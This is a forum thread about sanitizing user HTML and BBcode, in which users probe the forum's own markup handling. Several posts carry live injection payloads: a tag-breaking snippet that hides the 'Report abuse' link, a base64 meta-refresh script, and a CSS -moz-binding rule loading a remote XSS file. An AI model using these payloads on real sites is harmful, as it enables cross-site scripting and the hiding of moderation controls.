Reinventing XML



  • That's it for this page, commence more breaking! :)



  • I've discovered the perfect way to hide the Report abuse link:

    </div></div></td></tr></table></td></tr><tr valign="bottom"><td class="ForumPostFooterArea"><ul class="ForumPostStatistics CommonPrintHidden" style='clear: both;'> <li><li><li><a href='http://www.example.com'>Report abuse</a> <li><a href='http://www.example.com'>Quick Reply</a></ul></td></tr></table><table style="display:none"><tr><td><table><tr><td><div><div>(deformed post content, can be blank)

    This is a deformed post with my real abuse/quickreply links attached to it. For a real "exploit" it would be hidden with display:none rather than highlighted in yellow


  • Next post after it doesn't break



  • Test

    <edit> Too cool! You're totally elite :)

    (deformed post content, can be blank)


  • @Sunstorm said:

    It does kinda make sense from a whitelist point of view. There's a lot of things to protect from in regular HTML. The other day I discovered you can actually stick javascript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: Livejournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then add in the rest, without fear that some obscure tag will end up used in some strange way, for the purpose of sending all your password to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...)

    @Carnildo said:

    @Iago said:
    @kirchhoff said:
    The lone exception is slashdot. This is because they actually know what they're doing, and have been around the longest

    I was about to point out that there are loads of forums that use proper HTML for user comments - perlmonks, for example, is another that's been around for donkey's years and has a decent comment system.

    Then I noticed that I was having to use real HTML here, in this very post, because that's the only way I can find of putting a line break between paragraphs. Hmm, maybe it's not such a rare feature after all.


    The forum software here is a real WTF. I haven't had the patience to test, but I'm fairly sure it's quite vulnerable to XSS/javascript injection.

    It was last time I checked. Fortunately, they've fixed that particular exploit (fun bug in the HTML parser), though there's probably others.



  • @Random832 said:

    I've discovered the perfect way to hide the Report abuse link:

    </div></div></td></tr></table></td></tr><tr valign="bottom"><td class="ForumPostFooterArea"><ul class="ForumPostStatistics CommonPrintHidden" style='clear: both;'> <li><li><li><a href='http://www.example.com'>Report abuse</a> <li><a href='http://www.example.com'>Quick Reply</a></ul></td></tr></table><table style="display:none"><tr><td><table><tr><td><div><div>(deformed post content, can be blank)

    Please tell me they didn't allow CSS? That's just asking for trouble...



  • OK! I got it. My only concern is the recursivity in my body[...]

    Looking at my own reflection

    When suddenly it changes, violently it changes!

    Aw, there is no turning back now,

    You've woken up the machine...

    in meeee!!!



  • @makomk said:

    @Sunstorm said:
    It does kinda make sense from a whitelist point of view. There's a lot of things to protect from in regular HTML. The other day I discovered you can actually stick javascript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: Livejournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then add in the rest, without fear that some obscure tag will end up used in some strange way, for the purpose of sending all your password to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...).

    Also, BBcode isn't exactly immune from XSS attacks either if improperly implemented (and since a proper implementation is of about the same difficulty as a robust whitelisting HTML cleaner, guess what actually happens).



  • xss injection?

    <meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


  • <style>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</style>


  • @makomk said:

    @makomk said:
    @Sunstorm said:
    It does kinda make sense from a whitelist point of view. There's a lot of things to protect from in regular HTML. The other day I discovered you can actually stick javascript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: Livejournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then add in the rest, without fear that some obscure tag will end up used in some strange way, for the purpose of sending all your password to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...).

    Also, BBcode isn't exactly immune from XSS attacks either if improperly implemented (and since a proper implementation is of about the same difficulty as a robust whitelisting HTML cleaner, guess what actually happens).


    An old version of phpBB had a bug in the HTML sanitizer where it would let a forbidden tag through if a permitted tag matched the start of the forbidden tag.  Hence, if you'd blacklisted the "script" tag, but permitted the "s" tag, people could still insert JavaScript directly.



  • @svennieboy said:

    Can you elaborate on this and/or give some
    pointers? It sounds interesting, but I don't know what CSS construct
    you are referring to... 

    Thanks!

    Sven
     

    For example, you take all the comments in put them in a div with class 'comments', for example. And each comment is a div or table cell or some such with class 'comment_body', perhaps. And then you want to style markup that only applies to the allowed HTML in comments.

    Then you have a CSS definition that looks something like this: 

    div.comments { color: #403030; font-family: "new century schoolbook", serif }
    div.comments div.comment_body em { font-style: italic; }
    div.comments div.comment_body strong {font-weight: bold; color: #804040; }

    Which would be applied to this output:

    <div class="comments">
      <!-- Some comment header stuff -->
      <div class="comments_body">
        My post appears here. <em>This is in italics</em> <strong>This is bold AND brighter red than the rest of the comment text</strong>
      </div>
    </div>
    

    The idea being that you could allow simple HTML constructions like <em> and <strong> with nothing more than that (no attributes or weird nesting) and still be able to style it without "interpreting" the text during display ... just substituting it in between the div tags when producing output.



  • Test


Log in to reply